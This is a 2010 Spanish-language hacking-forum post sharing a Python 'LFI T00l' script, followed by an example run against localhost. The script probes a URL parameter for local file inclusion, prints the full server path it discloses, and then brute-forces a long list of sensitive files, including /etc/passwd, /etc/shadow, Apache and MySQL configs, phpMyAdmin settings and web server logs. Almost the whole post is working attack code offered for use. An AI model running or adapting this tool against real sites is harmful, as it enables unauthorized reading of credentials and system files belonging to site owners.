Hola a todos.
Acabo de terminar una tool para testear una vulnerabilidad LFI , si la pagina
es vulnerable entonces el script automaticamente intenta brutear archivos.
#!usr/bin/perl
#LFI T00l (C) Doddy Hackman
import os,sys,urllib2,re
files = ['../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc']
def header() :
print "\n--== LFI T00l ==--\n"
def copyright() :
print "\n\n(C) Doddy Hackman 2010\n"
exit(1)
def show() :
print "\n[*] Sintax : ",sys.argv[0]," <web>\n"
def toma(web) :
return urllib2.urlopen(web).read()
def fuzz(web):
print "\n[+] Fuzzing files...\n"
for file in files:
code = toma(web+file)
if not (re.findall("No such file or directory in",code)):
print "[File Found] : ",web,file
def test(web):
try:
print "\n[+] Testing vulnerability LFI in",web
code = toma(web+"'")
if(re.findall("No such file or directory in <b>(.*?)<\/b> on line",code,re.I)):
fpd = re.findall("No such file or directory in <b>(.*?)<\/b> on line",code,re.I)
print "\n[+] LFI Detected"
print "[+] Full Path discloure : ",fpd[0]
fuzz(web)
else:
print "[-] LFI Not Found"
except:
pass
header()
if len(sys.argv) != 2 :
show()
else :
test(sys.argv[1])
copyright()
#The End
Ejemplo de uso
python lfi.py http://127.0.0.1/lfi.php?file=
C:\Users\DoddyH\Desktop\Arsenal X parte 2>lfi.py http://127.0.0.1/lfi.php?file=
--== LFI T00l ==--
[+] Testing vulnerability LFI in http://127.0.0.1/lfi.php?file=
[+] LFI Detected
[+] Full Path discloure : C:\xampp\htdocs\lfi.php
[+] Fuzzing files...
(C) Doddy Hackman 2010